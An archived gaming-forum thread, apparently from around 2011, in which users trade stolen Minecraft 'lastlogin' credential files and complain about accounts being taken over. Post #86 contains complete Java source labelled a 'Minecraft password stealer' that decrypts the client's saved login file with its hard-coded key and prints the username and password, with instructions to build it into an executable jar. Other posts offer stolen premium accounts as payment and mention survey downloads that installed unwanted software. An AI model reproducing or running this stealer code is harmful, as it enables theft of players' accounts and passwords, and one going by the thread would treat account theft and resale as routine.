You are viewing our Forum Archives. To view or take place in current topics click here.
#81. Posted:
Status: Offline
Joined: Jul 26, 201113Year Member
Posts: 23
Reputation Power: 1
Status: Offline
Joined: Jul 26, 201113Year Member
Posts: 23
Reputation Power: 1
BTW im hiring someone to check all the downloads for me, to write down whether each lastlogin one works or not. just to see what accounts have been stolen. I'm willing to pay 5 premium personal MC accounts for someone to check all the downloads (#1-50). pm me!
- 0useful
- 1not useful
#82. Posted:
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 922
Reputation Power: 39
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 922
Reputation Power: 39
trevor1400E wrote BTW im hiring someone to check all the downloads for me, to write down whether each lastlogin one works or not. just to see what accounts have been stolen. I'm willing to pay 5 premium personal MC accounts for someone to check all the downloads (#1-50). pm me!
You can't change anything you only get the last login file.
- 0useful
- 1not useful
#83. Posted:
Status: Offline
Joined: Jul 26, 201113Year Member
Posts: 23
Reputation Power: 1
Status: Offline
Joined: Jul 26, 201113Year Member
Posts: 23
Reputation Power: 1
i know but some hackers keep somehow decrypting it and changeing passwords like a retard....
- 0useful
- 1not useful
#84. Posted:
Status: Offline
Joined: Jul 28, 201113Year Member
Posts: 1
Reputation Power: 0
Thanks this is legit.
- 1useful
- 0not useful
#85. Posted:
Status: Offline
Joined: Aug 01, 201014Year Member
Posts: 2,945
Reputation Power: 115
Status: Offline
Joined: Aug 01, 201014Year Member
Posts: 2,945
Reputation Power: 115
Just make it NOT a survey
Wrokin
Wrokin
- 1useful
- 0not useful
#86. Posted:
Status: Offline
Joined: Sep 25, 201014Year Member
Posts: 1,332
Reputation Power: 74
Status: Offline
Joined: Sep 25, 201014Year Member
Posts: 1,332
Reputation Power: 74
TTG-CraigRyder wrotetrevor1400E wrote BTW im hiring someone to check all the downloads for me, to write down whether each lastlogin one works or not. just to see what accounts have been stolen. I'm willing to pay 5 premium personal MC accounts for someone to check all the downloads (#1-50). pm me!
You can't change anything you only get the last login file.
Turn this into a executable jar file and it will give you the username and password.
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.PBEParameterSpec;
//Minecraft password stealer by aadster
public class Minecraft
{
public static void main(String [] args)
{
try
{
String appdata = System.getenv("APPDATA");
if (appdata != null)
{
Random random = new Random(43287234L);
byte[] salt = new byte[8];
random.nextBytes(salt);
//Looked up what Minecraft uses, turns out they use this common form of encryption with the Java API
PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);
SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec("passwordfile".toCharArray()));
Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
cipher.init(2, pbeKey, pbeParamSpec);
File location = new File(appdata, ".minecraft");
File passFile = new File(location, "lastlogin");
DataInputStream dis = null;
if (cipher != null)
{
dis = new DataInputStream(new CipherInputStream(new FileInputStream(passFile), cipher));
}
else
{
dis = new DataInputStream(new FileInputStream(passFile));
}
System.out.println(dis.readUTF() + ":" + dis.readUTF());
dis.close();
}
else
{
System.out.println("The system env. APPDATA was not found, probably not running Windows?");
}
}
catch (Exception ex)
{
}
}
}
I'm not uploading mine but it works.
Goodluck
- 0useful
- 1not useful
#87. Posted:
Status: Offline
Joined: Jul 28, 201113Year Member
Posts: 2
Reputation Power: 0
Status: Offline
Joined: Jul 28, 201113Year Member
Posts: 2
Reputation Power: 0
this is bull i compleated 4 survays an none of them work now have abunch of crap installed on my comp can som 1 plz send me 1 thru skype it would be much apriciated
my skype name is deathasyou add me if you are going to give me 1 it will b much appreciated
plzzz some of u have more than 1 account
my skype name is deathasyou add me if you are going to give me 1 it will b much appreciated
plzzz some of u have more than 1 account
- 0useful
- 0not useful
#88. Posted:
Status: Offline
Joined: Jul 28, 201113Year Member
Posts: 2
Reputation Power: 0
Status: Offline
Joined: Jul 28, 201113Year Member
Posts: 2
Reputation Power: 0
-TTG_DaN- wrote I just got 23! Now i have 49 20 19 21 and 22
thats so unfair mind sparing one of them plzzz u have a crapload and i have none spare just 1
- 0useful
- 1not useful
#89. Posted:
Status: Offline
Joined: Apr 20, 201113Year Member
Posts: 763
Reputation Power: 35
Status: Offline
Joined: Apr 20, 201113Year Member
Posts: 763
Reputation Power: 35
Deathasyou wrote-TTG_DaN- wrote I just got 23! Now i have 49 20 19 21 and 22
thats so unfair mind sparing one of them plzzz u have a crapload and i have none spare just 1
dude u can just download all the ones he has downloaded
- 0useful
- 1not useful
#90. Posted:
Status: Offline
Joined: Jul 28, 201113Year Member
Posts: 1
Reputation Power: 0
27 no longer works. D:
- 0useful
- 1not useful
You are viewing our Forum Archives. To view or take place in current topics click here.